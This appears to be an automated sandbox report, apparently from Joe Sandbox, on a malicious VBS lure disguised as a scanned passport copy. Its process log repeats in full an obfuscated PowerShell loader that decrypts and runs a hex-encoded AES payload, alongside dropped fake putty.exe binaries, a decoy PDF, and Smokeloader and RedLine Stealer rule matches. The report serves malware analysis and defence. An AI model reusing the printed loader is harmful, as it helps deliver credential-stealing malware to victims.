E9021E1B76EAE56EF681BBC20E3C74BCCAA8E25DECF9C13896D1252B4B86B2315F62ECC43FDD7F9D446C70E046C7872722C69950AC7A26563C81C0A52F3B0F0D43D41FE0060D34820472AE9A9818D2FD3B117A4B0084EAA21D1666A9297DCAEACADD63462FBB1E22C56869537CA0C0E1CD52EABFF12858BC9B1DDDC8CB4C70E9FA2549B5144F447D1DEFC94F5830D9CAC04660B19C385EC1A3D989AC7BAD8C3E7E908C697C4DA249D156475901B73F3C800C602E586AA6998C17EB947E3D2E8A13E7292546210AF7EB29B003DA7407AF81F5B7811619B414E06D1D724EF79FE960509F6D85F4B55A5B6A365F6EE49825F0B19433EA2C64737468F1FAA1DDA90E230F23CB6751052459789FAC25AB27097516E251B4C56D5B1497389F33F64F9C729FADB9F635E6771D884FFAD2363C3D29D49812042636E0B8AAEE30');$idRJO=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((wfMpF('4F6C6D774C5361495051654D7258624F')),[byte[]]::new(16)).TransformFinalBlock($Ralma,0,$Ralma.Length)); & $idRJO.Substring(0,3) $idRJO.Substring(3)
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function wfMpF($MmiD){return -split ($MmiD -replace '..', '0x$& ')};$Ralma = wfMpF('6DDD913A204EDA9B48CF5583720FA53B3C5CDEE6E974B7BF173341D66880A83528E76A5A809EDA47D2C263E95E00A51AE2A33D069542CCAE0C0FEF761523C7AFE37B64185C653B4C4BF39E67E1D89CD6636984FC646C493C76294187D1B2B75D79DBAAB680164B0C94848AA09BF281C313B7C3C2532160823EFECF40AF7A9240375A29DD3D82C002B29486566C166F6F04711F20F7F5B2B6CDC61AA7908A19FE7DE86886141F7A340433F1A7D86ED97FA28C2AC93960B814156D48D922F4B029C07206C1AEF6B44FF7AF133921B3DB8F2FF073F4CFFA862EDB9214CE28C296D8FB5162D5AB69B39935125AB3242B742A33D4141147FCF532EEB49A69FEA321ACE3E5BFFDC1520FB98A143BBAFD22BB525550D37D463F288C61A14B1258687EB239E9A260D0E160D9614F09967FE97F9B2CE6BE1C24011E78CAAB16CEEA4345678EAB2756D340EA7C849F355578CB519AA0DE8625F493EADBD13583073BE0D247EBD15CD925FE851855979D18651080CF3BD6FB803715B373C134F7D1EA1E3FAB7E02D0D4AD6FC40EAD36C911A1AE73D421AC10EFE01473747C3B4FC05FD6D4D08C3521DB6BA6E9EEF6CB8B1C7FC76884C910C22860E3575831C23A88693A6D7FE1F158E001ED75B4588C08ED639A5B3F223E76CF1C17495201F16D4149F714CA4BD42D2D5E17399CF5E4FCAE83C94E9DBA2089F3C430CE2585999674221CE62E61DCB128072E936B5DFED4CEBEEBA9232E582C33488E026E0F5123211B5E9B12B46C0CA95D1F9A903B6B2310CB4E108C5C9B8328E9021E1B76EAE56EF681BBC20E3C74BCCAA8E25DECF9C13896D1252B4B86B2315F62ECC43FDD7F9D446C70E046C7872722C69950AC7A26563C81C0A52F3B0F0D43D41FE0060D34820472AE9A9818D2FD3B117A4B0084EAA21D1666A9297DCAEACADD63462FBB1E22C56869537CA0C0E1CD52EABFF12858BC9B1DDDC8CB4C70E9FA2549B5144F447D1DEFC94F5830D9CAC04660B19C385EC1A3D989AC7BAD8C3E7E908C697C4DA249D156475901B73F3C800C602E586AA6998C17EB947E3D2E8A13E7292546210AF7EB29B003DA7407AF81F5B7811619B414E06D1D724EF79FE960509F6D85F4B55A5B6A365F6EE49825F0B19433EA2C64737468F1FAA1DDA90E230F23CB6751052459789FAC25AB27097516E251B4C56D5B1497389F33F64F9C729FADB9F635E6771D884FFAD2363C3D29D49812042636E0B8AAEE30');$idRJO=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((wfMpF('4F6C6D774C5361495051654D7258624F')),[byte[]]::new(16)).TransformFinalBlock($Ralma,0,$Ralma.Length)); & $idRJO.Substring(0,3) $idRJO.Substring(3)Jump to behavior
                  Source: C:\Windows\explorer.exeProcess Stats: CPU usage > 49%
                  Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 6_2_00402F8F RtlCreateUserThread,NtTerminateProcess,6_2_00402F8F
                  Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 6_2_004013BF NtAllocateVirtualMemory,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,6_2_004013BF
                  Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 6_2_00401412 NtAllocateVirtualMemory,6_2_00401412
                  Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 6_2_004013CA NtAllocateVirtualMemory,6_2_004013CA
                  Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 6_2_004014D3 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,6_2_004014D3
                  Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 6_2_004013D9 NtAllocateVirtualMemory,6_2_004013D9
                  Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 6_2_004013E0 NtAllocateVirtualMemory,6_2_004013E0
                  Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 6_2_004013F0 NtAllocateVirtualMemory,6_2_004013F0
                  Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 6_2_004013F4 NtAllocateVirtualMemory,6_2_004013F4
                  Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 6_2_004014F7 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,6_2_004014F7
                  Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 6_2_004014B5 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,6_2_004014B5
                  Source: C:\Users\user\AppData\Roaming\ddhfdfuCode function: 13_2_00402F8F RtlCreateUserThread,NtTerminateProcess,13_2_00402F8F
                  Source: C:\Users\user\AppData\Roaming\ddhfdfuCode function: 13_2_004013BF NtAllocateVirtualMemory,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,13_2_004013BF
                  Source: C:\Users\user\AppData\Roaming\ddhfdfuCode function: 13_2_00401412 NtAllocateVirtualMemory,13_2_00401412
                  Source: C:\Users\user\AppData\Roaming\ddhfdfuCode function: 13_2_004013CA NtAllocateVirtualMemory,13_2_004013CA
                  Source: C:\Users\user\AppData\Roaming\ddhfdfuCode function: 13_2_004014D3 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,13_2_004014D3
                  Source: C:\Users\user\AppData\Roaming\ddhfdfuCode function: 13_2_004013D9 NtAllocateVirtualMemory,13_2_004013D9
                  Source: C:\Users\user\AppData\Roaming\ddhfdfuCode function: 13_2_004013E0 NtAllocateVirtualMemory,13_2_004013E0
                  Source: C:\Users\user\AppData\Roaming\ddhfdfuCode function: 13_2_004013F0 NtAllocateVirtualMemory,13_2_004013F0
                  Source: C:\Users\user\AppData\Roaming\ddhfdfuCode function: 13_2_004013F4 NtAllocateVirtualMemory,13_2_004013F4
                  Source: C:\Users\user\AppData\Roaming\ddhfdfuCode function: 13_2_004014F7 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,13_2_004014F7
                  Source: C:\Users\user\AppData\Roaming\ddhfdfuCode function: 13_2_004014B5 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,13_2_004014B5
                  Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF848FE0FB62_2_00007FF848FE0FB6
                  Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 6_2_00415CCA6_2_00415CCA
                  Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 6_2_00418CB76_2_00418CB7
                  Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 6_2_004129C76_2_004129C7
                  Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 6_2_004191FB6_2_004191FB
                  Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 6_2_004132706_2_00413270
                  Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 6_2_0041367C6_2_0041367C
                  Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 6_2_0040CA8E6_2_0040CA8E
                  Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 6_2_00412E9C6_2_00412E9C
                  Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 6_2_00413A9C6_2_00413A9C
                  Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 6_2_0041973F6_2_0041973F
                  Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 6_2_00413FDC6_2_00413FDC
                  Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 6_2_0041AB986_2_0041AB98
                  Source: C:\Users\user\AppData\Roaming\ddhfdfuCode function: 13_2_00415CCA13_2_00415CCA
                  Source: C:\Users\user\AppData\Roaming\ddhfdfuCode function: 13_2_00418CB713_2_00418CB7
                  Source: C:\Users\user\AppData\Roaming\ddhfdfuCode function: 13_2_004129C713_2_004129C7
                  Source: C:\Users\user\AppData\Roaming\ddhfdfuCode function: 13_2_004191FB13_2_004191FB
                  Source: C:\Users\user\AppData\Roaming\ddhfdfuCode function: 13_2_0041327013_2_00413270
                  Source: C:\Users\user\AppData\Roaming\ddhfdfuCode function: 13_2_0041367C13_2_0041367C
                  Source: C:\Users\user\AppData\Roaming\ddhfdfuCode function: 13_2_0040CA8E13_2_0040CA8E
                  Source: C:\Users\user\AppData\Roaming\ddhfdfuCode function: 13_2_00412E9C13_2_00412E9C
                  Source: C:\Users\user\AppData\Roaming\ddhfdfuCode function: 13_2_00413A9C13_2_00413A9C
                  Source: C:\Users\user\AppData\Roaming\ddhfdfuCode function: 13_2_0041973F13_2_0041973F
                  Source: C:\Users\user\AppData\Roaming\ddhfdfuCode function: 13_2_00413FDC13_2_00413FDC
                  Source: C:\Users\user\AppData\Roaming\ddhfdfuCode function: 13_2_0041AB9813_2_0041AB98
                  Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Roaming\ddhfdfu 7A70F2C8E40FE861DB51E119D589C7C5D036581D7F46474B364B1280ED8A540B
                  Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Roaming\putty.exe 7A70F2C8E40FE861DB51E119D589C7C5D036581D7F46474B364B1280ED8A540B
                  Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 2164
                  Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 2164Jump to behavior
                  Source: 00000006.00000002.2239564314.00000000021D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                  Source: 00000006.00000002.2239633273.0000000002211000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                  Source: 0000000D.00000002.2474381607.0000000000751000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                  Source: 00000006.00000002.2239261367.0000000000550000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                  Source: 0000000D.00000002.2474059930.0000000000610000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                  Source: 0000000D.00000002.2473769295.0000000000540000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                  Source: 0000000D.00000002.2474086059.0000000000620000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                  Source: 00000006.00000002.2239346704.00000000006D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                  Source: Process Memory Space: powershell.exe PID: 6640, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                  Source: putty.exe.2.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: ddhfdfu.12.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: classification engineClassification label: mal100.troj.expl.evad.winVBS@23/60@5/3
                  Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 6_2_00561DB7 CreateToolhelp32Snapshot,Module32First,6_2_00561DB7
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\invoce2.pdfJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1672:120:WilError_03
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_b1msqrw0.fyg.ps1Jump to behavior
                  Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\#U0421#U043a#U0430#U043d-#U043a#U043e#U043fi#U044f #U041f#U0430#U0441#U043f#U043e#U0440#U0442.vbs"
                  Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                  Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\#U0421#U043a#U0430#U043d-#U043a#U043e#U043fi#U044f #U041f#U0430#U0441#U043f#U043e#U0440#U0442.vbs"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function wfMpF($MmiD){return -split ($MmiD -replace '..', '0x$& ')};$Ralma = wfMpF('6DDD913A204EDA9B48CF5583720FA53B3C5CDEE6E974B7BF173341D66880A83528E76A5A809EDA47D2C263E95E00A51AE2A33D069542CCAE0C0FEF761523C7AFE37B64185C653B4C4BF39E67E1D89CD6636984FC646C493C76294187D1B2B75D79DBAAB680164B0C94848AA09BF281C313B7C3C2532160823EFECF40AF7A9240375A29DD3D82C002B29486566C166F6F04711F20F7F5B2B6CDC61AA7908A19FE7DE86886141F7A340433F1A7D86ED97FA28C2AC93960B814156D48D922F4B029C07206C1AEF6B44FF7AF133921B3DB8F2FF073F4CFFA862EDB9214CE28C296D8FB5162D5AB69B39935125AB3242B742A33D4141147FCF532EEB49A69FEA321ACE3E5BFFDC1520FB98A143BBAFD22BB525550D37D463F288C61A14B1258687EB239E9A260D0E160D9614F09967FE97F9B2CE6BE1C24011E78CAAB16CEEA4345678EAB2756D340EA7C849F355578CB519AA0DE8625F493EADBD13583073BE0D247EBD15CD925FE851855979D18651080CF3BD6FB803715B373C134F7D1EA1E3FAB7E02D0D4AD6FC40EAD36C911A1AE73D421AC10EFE01473747C3B4FC05FD6D4D08C3521DB6BA6E9EEF6CB8B1C7FC76884C910C22860E3575831C23A88693A6D7FE1F158E001ED75B4588C08ED639A5B3F223E76CF1C17495201F16D4149F714CA4BD42D2D5E17399CF5E4FCAE83C94E9DBA2089F3C430CE2585999674221CE62E61DCB128072E936B5DFED4CEBEEBA9232E582C33488E026E0F5123211B5E9B12B46C0CA95D1F9A903B6B2310CB4E108C5C9B8328E9021E1B76EAE56EF681BBC20E3C74BCCAA8E25DECF9C13896D1252B4B86B2315F62ECC43FDD7F9D446C70E046C7872722C69950AC7A26563C81C0A52F3B0F0D43D41FE0060D34820472AE9A9818D2FD3B117A4B0084EAA21D1666A9297DCAEACADD63462FBB1E22C56869537CA0C0E1CD52EABFF12858BC9B1DDDC8CB4C70E9FA2549B5144F447D1DEFC94F5830D9CAC04660B19C385EC1A3D989AC7BAD8C3E7E908C697C4DA249D156475901B73F3C800C602E586AA6998C17EB947E3D2E8A13E7292546210AF7EB29B003DA7407AF81F5B7811619B414E06D1D724EF79FE960509F6D85F4B55A5B6A365F6EE49825F0B19433EA2C64737468F1FAA1DDA90E230F23CB6751052459789FAC25AB27097516E251B4C56D5B1497389F33F64F9C729FADB9F635E6771D884FFAD2363C3D29D49812042636E0B8AAEE30');$idRJO=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((wfMpF('4F6C6D774C5361495051654D7258624F')),[byte[]]::new(16)).TransformFinalBlock($Ralma,0,$Ralma.Length)); & $idRJO.Substring(0,3) $idRJO.Substring(3)
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Roaming\invoce2.pdf"
                  Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\putty.exe "C:\Users\user\AppData\Roaming\putty.exe"
                  Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                  Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2068 --field-trial-handle=1768,i,4178814619704218738,12566642219925520578,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
                  Source: unknownProcess created: C:\Users\user\AppData\Roaming\ddhfdfu C:\Users\user\AppData\Roaming\ddhfdfu
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function wfMpF($MmiD){return -split ($MmiD -replace '..', '0x$& ')};$Ralma = wfMpF('6DDD913A204EDA9B48CF5583720FA53B3C5CDEE6E974B7BF173341D66880A83528E76A5A809EDA47D2C263E95E00A51AE2A33D069542CCAE0C0FEF761523C7AFE37B64185C653B4C4BF39E67E1D89CD6636984FC646C493C76294187D1B2B75D79DBAAB680164B0C94848AA09BF281C313B7C3C2532160823EFECF40AF7A9240375A29DD3D82C002B29486566C166F6F04711F20F7F5B2B6CDC61AA7908A19FE7DE86886141F7A340433F1A7D86ED97FA28C2AC93960B814156D48D922F4B029C07206C1AEF6B44FF7AF133921B3DB8F2FF073F4CFFA862EDB9214CE28C296D8FB5162D5AB69B39935125AB3242B742A33D4141147FCF532EEB49A69FEA321ACE3E5BFFDC1520FB98A143BBAFD22BB525550D37D463F288C61A14B1258687EB239E9A260D0E160D9614F09967FE97F9B2CE6BE1C24011E78CAAB16CEEA4345678EAB2756D340EA7C849F355578CB519AA0DE8625F493EADBD13583073BE0D247EBD15CD925FE851855979D18651080CF3BD6FB803715B373C134F7D1EA1E3FAB7E02D0D4AD6FC40EAD36C911A1AE73D421AC10EFE01473747C3B4FC05FD6D4D08C3521DB6BA6E9EEF6CB8B1C7FC76884C910C22860E3575831C23A88693A6D7FE1F158E001ED75B4588C08ED639A5B3F223E76CF1C17495201F16D4149F714CA4BD42D2D5E17399CF5E4FCAE83C94E9DBA2089F3C430CE2585999674221CE62E61DCB128072E936B5DFED4CEBEEBA9232E582C33488E026E0F5123211B5E9B12B46C0CA95D1F9A903B6B2310CB4E108C5C9B8328E9021E1B76EAE56EF681BBC20E3C74BCCAA8E25DECF9C13896D1252B4B86B2315F62ECC43FDD7F9D446C70E046C7872722C69950AC7A26563C81C0A52F3B0F0D43D41FE0060D34820472AE9A9818D2FD3B117A4B0084EAA21D1666A9297DCAEACADD63462FBB1E22C56869537CA0C0E1CD52EABFF12858BC9B1DDDC8CB4C70E9FA2549B5144F447D1DEFC94F5830D9CAC04660B19C385EC1A3D989AC7BAD8C3E7E908C697C4DA249D156475901B73F3C800C602E586AA6998C17EB947E3D2E8A13E7292546210AF7EB29B003DA7407AF81F5B7811619B414E06D1D724EF79FE960509F6D85F4B55A5B6A365F6EE49825F0B19433EA2C64737468F1FAA1DDA90E230F23CB6751052459789FAC25AB27097516E251B4C56D5B1497389F33F64F9C729FADB9F635E6771D884FFAD2363C3D29D49812042636E0B8AAEE30');$idRJO=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((wfMpF('4F6C6D774C5361495051654D7258624F')),[byte[]]::new(16)).TransformFinalBlock($Ralma,0,$Ralma.Length)); & $idRJO.Substring(0,3) $idRJO.Substring(3)Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Roaming\invoce2.pdf"Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\putty.exe "C:\Users\user\AppData\Roaming\putty.exe" Jump to behavior
                  Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215Jump to behavior
                  Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2068 --field-trial-handle=1768,i,4178814619704218738,12566642219925520578,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8Jump to behavior
                  Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
